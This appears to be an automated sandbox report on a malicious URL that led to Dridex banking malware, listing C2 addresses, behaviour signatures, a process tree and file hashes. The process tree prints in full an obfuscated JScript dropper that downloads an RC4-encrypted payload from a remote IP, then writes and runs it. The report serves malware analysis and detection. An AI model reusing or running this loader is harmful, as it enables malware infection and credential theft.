Resubmissions

20-10-2021 01:50

211020-b9l9kageb6 6

20-10-2021 01:45

211020-b6eqbagea9 10

Analysis

  • max time kernel
    136s
  • max time network
    139s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    20-10-2021 01:45

General

  • Target

    https://hilltop2exit.xyz/kjlfkvd82d

  • Sample

    211020-b6eqbagea9

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

37.48.124.102:9676

84.33.2.126:6225

188.40.33.77:8194

rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://hilltop2exit.xyz/kjlfkvd82d
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1860 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1708
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.40/?MTM1Nzg4&UhDv&sdfsdfdfg=twix&ogfgafgn4=wH_QMvXcJwDNFYPJKeXD&fhfghddfsdf=cars&cxssdvxcv=110oone.78fd72.406b1m7w1&dsfdffg43t=TKNbP0fOH0WD2MjN2LHSRcHsLlni0OrBDV2rtlzyQl_U8_EvKeFXPFLhjEGBLQEwnY0LU1JCpKisjROEnRWZg5TQ-CWPaQl1otKWJA&LyHMTcwMjc=" "2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3212
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.40/?MTM1Nzg4&UhDv&sdfsdfdfg=twix&ogfgafgn4=wH_QMvXcJwDNFYPJKeXD&fhfghddfsdf=cars&cxssdvxcv=110oone.78fd72.406b1m7w1&dsfdffg43t=TKNbP0fOH0WD2MjN2LHSRcHsLlni0OrBDV2rtlzyQl_U8_EvKeFXPFLhjEGBLQEwnY0LU1JCpKisjROEnRWZg5TQ-CWPaQl1otKWJA&LyHMTcwMjc=" "2"
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:3576
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c y578n.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:676
            • C:\Users\Admin\AppData\Local\Temp\y578n.exe
              y578n.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:3660

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
    MD5

    ab5c36d10261c173c5896f3478cdc6b7

    SHA1

    87ac53810ad125663519e944bc87ded3979cbee4

    SHA256

    f8e90fb0557fe49d7702cfb506312ac0b24c97802f9c782696db6d47f434e8e9

    SHA512

    e83e4eae44e7a9cbcd267dbfc25a7f4f68b50591e3bbe267324b1f813c9220d565b284994ded5f7d2d371d50e1ebfa647176ec8de9716f754c6b5785c6e897fa

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
    MD5

    6531cf71efff000de6f60c5329b5d5b1

    SHA1

    915e62ebd9976bf428618785e71f0792c22709cb

    SHA256

    77cdf430ec8d7a6623107b3b910165a3e271c26397756fc71791a3a6f4a002c3

    SHA512

    d67b09b27a5ace8aa3f1cadfe1d63dc21276b9ff486e8b471209eec6534437f005bb81493af93ae6d1ff4f309dfcc2053fdf6dc64ba1f101c4533df847338c03

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\5SGTWQ9T.cookie
    MD5

    721aa26b8ad8f50bffdbee9f00ee1f58

    SHA1

    355bb2480bae544eeabaecdefa394a3777921808

    SHA256

    a3b092d0cf004f31de561d5ea7add9023af0fcae99599ccb5678b4876fe3f2d5

    SHA512

    88febe716c2e49a4e12ad10669edd1045072983ab2281315ec88c2ff85bef5052ff407f52edfa738d3d5750b4de30891ba0843d0ec50222f000f22c3d6ece943

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\P8JYE1BO.cookie
    MD5

    12e002d409618fc4056388a595fb03d5

    SHA1

    994bdc65814ba415c93ad95528a331bf3b2d1791

    SHA256

    082e9bbc1f25296cda304c7ed50b49760c583f9982642b7bd5443b245fb8272a

    SHA512

    6194fab5bc2a6c73220d9a3a0f25aa5d47551dcae2e70a56d8af86a7f6253c725101a45f5044f58743021d773ecac368cd8b8c1a676fd7084a9d0f1dfadab074

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

  • C:\Users\Admin\AppData\Local\Temp\y578n.exe
    MD5

    99c777be6fb871151545cfcc59c3f89f

    SHA1

    d2855b68c2aa24d4721bc0a30c0e7b2a747acefd

    SHA256

    e3dc9d3ef3a79da287ae7357a2d64c47bb01a27946c62c80225636c1bfa03629

    SHA512

    441792a45ffdd663a3e0b81bc797bab39c9de3ea7bc88814c2722fc4d915dc67ed8ec2eb9688cbcb2ae0550fccfaaa1f481ddf24f47d0050663c5c1fba4c5ef3

  • C:\Users\Admin\AppData\Local\Temp\y578n.exe
    MD5

    99c777be6fb871151545cfcc59c3f89f

    SHA1

    d2855b68c2aa24d4721bc0a30c0e7b2a747acefd

    SHA256

    e3dc9d3ef3a79da287ae7357a2d64c47bb01a27946c62c80225636c1bfa03629

    SHA512

    441792a45ffdd663a3e0b81bc797bab39c9de3ea7bc88814c2722fc4d915dc67ed8ec2eb9688cbcb2ae0550fccfaaa1f481ddf24f47d0050663c5c1fba4c5ef3

  • memory/676-172-0x0000000000000000-mapping.dmp
  • memory/1708-140-0x0000000000000000-mapping.dmp
  • memory/1860-133-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-163-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-128-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-129-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-131-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-115-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-132-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-135-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-136-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-137-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-138-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-125-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-141-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-142-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-144-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-145-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-147-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-149-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-150-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-151-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-155-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-156-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-157-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-127-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-164-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-165-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-166-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-167-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-168-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-116-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-117-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-124-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-123-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-119-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-122-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-121-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-120-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-188-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-178-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-182-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-183-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-186-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/1860-187-0x00007FFB859A0000-0x00007FFB85A0B000-memory.dmp
    Filesize

    428KB

  • memory/3212-169-0x0000000000000000-mapping.dmp
  • memory/3576-170-0x0000000000000000-mapping.dmp
  • memory/3660-177-0x0000000000400000-0x000000000047A000-memory.dmp
    Filesize

    488KB

  • memory/3660-176-0x0000000000710000-0x000000000074C000-memory.dmp
    Filesize

    240KB

  • memory/3660-173-0x0000000000000000-mapping.dmp